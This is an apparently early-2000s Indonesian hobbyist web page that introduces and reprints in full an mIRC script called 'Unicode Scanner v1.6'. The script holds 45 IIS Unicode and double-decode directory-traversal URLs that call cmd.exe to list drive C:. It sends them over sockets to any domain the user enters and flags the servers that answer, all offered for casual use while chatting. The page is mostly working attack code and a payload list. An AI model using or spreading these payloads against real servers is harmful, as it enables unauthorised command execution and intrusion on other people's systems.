WELCOME TO MY PAGE

 

HOME

Info Virus

Cerita Gaib

Mp3

Fotoku

Babad

Tips WIndows XP

DoS pada IIS 5.0

Hack pakai MIRC

War Script Mirc

 

Bug unicode ini tentunya tidak asing lagi bagi anda, dan bagi anda yang senang dengan hacking dan main irc kini ada kabar gembira untuk anda. Saking populernya jenis bug ini, CyberMad, admin dari Madcode(http://www.madcodes.com) telah membuat script di IRC yang bisa anda masukkan kedalam irc client anda seperti Mirc dan mengecek server yang terkena bug sembari asyik ber chatting ria.

Walaupun CyberMad menamakannya sebagai Unicode scanner, tapi ternyata bug Decode juga di cek oleh script ini sehingga namanya tampaknya tidak menunjukkan features aslinya yang bisa mengecek unicode dan decode sekaligus. Pada saat saya mencobanya, cukup bagus hasil yang didapatkan walaupun sempat terjadi beberapa error seperti /sockopen: 'URL-Unicode' socket in use, dll.

Berikut adalah script yang asli dibuat oleh CyberMad :

 

; ---------< MadCodes mIRC Scripters Crew >---------
; Filename..: Unicode.mrc [Unicode Scanner]
; Release...: v1.6
; Author....: CyberMad (cybermad@softhome.net)
; Date......: June 03, 2001
; URL.......: http://www.madcodes.com/
; Channel...: #MadCodes (irc.DAL.net 7000)
; --------------------------------------------------
;
; REQUIREMENTS: Atleast mIRC v5.8x and above (tested on 5.8x only).
; INSTALLATION: 
; 1. Copy all of these scripts to Notepad and save as Unicode.mrc
; 2. Put the Unicode.mrc into mIRC directory. 
; 3. Load the script: /load -rs Unicode.mrc and type /remote on (optional).
; COPYRIGHT: You may distribute this script anywhere you like. All I ask is that you'll always include this Text File (Unchanged please) if you do. It can help many a Newbie to install the script. Also, I worked very hard at this script. Please keep it that way and don't claim it as your own.
; TIPS: Scan more than 1 URL by open new mIRC client.
;
;-------- - -
; Remote
;-------- - -
on *:LOAD:{
echo 0 -s 7,8|8,7|4,7|7,4|5,4|4,5|1,5|5,1| 9,1 MadCodes Script v1.2 1,1|5,1|1,5|4,5|5,4|7,4|4,7|8,7|7,8|
echo 0 -s 7,8|8,7|4,7|7,4|5,4|4,5|1,5|5,1| 9,1 1,1.................... 5,1 |1,5|4,5|5,4|7,4|4,7|8,7|7,8|
echo 0 -s 7,8|8,7|4,7|7,4|5,4|4,5|1,5|5,1| 9,1 1,1..9,1www.madcodes.com1,1.. 5,1 |1,5|4,5|5,4|7,4|4,7|8,7|7,8|
echo 0 -s 7,8|8,7|4,7|7,4|5,4|4,5|1,5|5,1| 9,1 1,1.9,1#madcodes (DALnet)1,1. 5,1 |1,5|4,5|5,4|7,4|4,7|8,7|7,8|
echo 0 -s 7,8|8,7|4,7|7,4|5,4|4,5|1,5|5,1| 9,1 1,1.................... 5,1 |1,5|4,5|5,4|7,4|4,7|8,7|7,8|1,0By: 4,0C12,0yber4,0M12,0ad 1,0©
echo 0 -s 1,0----------------------------------------Unicode Scanner v1.6
set %Unicode1 /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
set %Unicode2 /scripts/.%252e.%252e/winnt/system32/cmd.exe?/c+dir+c:\
set %Unicode3 /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
set %Unicode4 /scripts/..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
set %Unicode5 /scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
set %Unicode6 /scripts/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
set %Unicode7 /scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
set %Unicode8 /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
set %Unicode9 /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
set %Unicode10 /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
set %Unicode11 /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
set %Unicode12 /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
set %Unicode13 /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
set %Unicode14 /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
set %Unicode15 /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
set %Unicode16 /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
set %Unicode17 /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
set %Unicode18 /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
set %Unicode19 /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
set %Unicode20 /cgi-bin/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
set %Unicode21 /cgi-bin/.%252e.%252e/winnt/system32/cmd.exe?/c+dir+c:\
set %Unicode22 /cgi-bin/..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
set %Unicode23 /cgi-bin/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
set %Unicode24 /cgi-bin/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
set %Unicode25 /cgi-bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
set %Unicode26 /cgi-bin/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
set %Unicode27 /cgi-bin/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
set %Unicode28 /cgi-bin/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
set %Unicode29 /cgi-bin/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
set %Unicode30 /cgi-bin/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
set %Unicode31 /cgi-bin/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
set %Unicode32 /cgi-bin/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
set %Unicode33 /cgi-bin/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
set %Unicode34 /cgi-bin/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
set %Unicode35 /cgi-bin/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
set %Unicode36 /cgi-bin/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
set %Unicode37 /cgi-bin/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
set %Unicode38 /cgi-bin/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
set %Unicode39 /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir+c:\
set %Unicode40 /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
set %Unicode41 /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
set %Unicode42 /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
set %Unicode43 /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
set %Unicode44 /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
set %Unicode45 /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
set %ScannerStatus OFF
}
#ScanUnicode off
on *:SOCKOPEN:URL-Unicode*: { 
window -l @Unicode-Scanner | aline -c @Unicode-Scanner $1- @Try unicode type %UnicodeCount ( $read -l1 Unicode-Scanner.txt ).
sockwrite -n $sockname GET $read -l1 Unicode-Scanner.txt HTTP/1.1
sockwrite -n $sockname Host: %URL-Unicode 
sockwrite -n $sockname Connection: keep-alive 
sockwrite $sockname $crlf

on *:SOCKCLOSE:URL-Unicode*: { 
inc %UnicodeCount
write -c Unicode-Scanner.txt %Unicode [ $+ [ %UnicodeCount ] ]
if (%UnicodeCount <= 45) {
/.timerSock 1 1 SockOpen URL-Unicode %URL-Unicode 80 }
if (%UnicodeCount == 46) { window -l @Unicode-Scanner | aline -c @Unicode-Scanner $1- 7S12canner:1 ( $+ %URL-Unicode $+ ) closed. | /.disable #ScanUnicode }
}
on *:SOCKREAD:URL-Unicode*: {
sockread %Temp-Unicode 
if (HTTP/1.1 200 OK isin %Temp-Unicode) { window -l @Unicode-Scanner | aline -c @Unicode-Scanner $1- ***7H12as been detected as vulnerable unicode to the URL (check your Status Window). 4ö | echo -s 7U12RL: 1http:// $+ %URL-Unicode $+ $read -l1 Unicode-Scanner.txt } | elseif (HTTP/1.0 500 Server Error isin %Temp-Unicode || HTTP/1.1 403 Access Forbidden isin %Temp-Unicode || HTTP/1.1 404 Object Not Found isin %Temp-Unicode || HTTP/1.1 500 Server Error isin %Temp-Unicode) { window -l @Unicode-Scanner | aline -c @Unicode-Scanner $1- ***7N12ot vulnerable to the unicode exploit. }
}
#ScanUnicode end

#ScanURL off
on *:SOCKOPEN:URL*: { 
window -l @URL-Scanner | aline -c @URL-Scanner $1- 7S12canner:1 $sockname ( $+ $sock($sockname).ip or %URL-Scan $+ ) opened.
sockwrite -n $sockname GET / HTTP/1.1
sockwrite -n $sockname Host: %URL-Scan 
sockwrite -n $sockname Connection: keep-alive 
sockwrite $sockname $crlf 
}
on *:SOCKCLOSE:URL*: /window -l @URL-Scanner | aline -c @URL-Scanner $1- 7S12canner:1 $sockname ( $+ $sock($sockname).ip or %URL-Scan $+ ) closed. | /.disable #ScanURL
on *:SOCKREAD:URL*: { 
sockread %temp 
if (%temp) { /window -l @URL-Scanner | /aline -c @URL-Scanner $1- %temp }
}
#ScanURL end
;-------- - -
; Popups
;-------- - -
menu menubar {
Scanner
.URL Header:/.enable #ScanURL | /set %URL-Scan $$?="domain.com or www.domain.com (without http://)" | /SockOpen URL %URL-Scan 80
.-
.Scan Unicode [[ $+ %ScannerStatus $+ ]]:if (%ScannerStatus == OFF) { /set %ScannerStatus ON | /.enable #ScanUnicode | /set %UnicodeCount 1 | write -c Unicode-Scanner.txt %Unicode [ $+ [ %UnicodeCount ] ] | /set %URL-Unicode $$?="domain.com or www.domain.com (without http://)" | /window -l @Unicode-Scanner | aline -c @Unicode-Scanner $1- 7S12canner:1 $sockname ( $+ %URL-Unicode $+ ) opened. | /SockOpen URL-Unicode %URL-Unicode 80 } | elseif (%ScannerStatus == ON) { /set %ScannerStatus OFF | /.disable #ScanUnicode | /window -l @Unicode-Scanner | aline -c @Unicode-Scanner $1- 7S12canner:1 ( $+ %URL-Unicode $+ ) closed. }
 

Send mail to nugraha_swadharma@yahoo.com apabila ada pertanyaan atau komentar tentang web site ini.
Copyright © 2002 Nugraha
Last modified: 29-05-03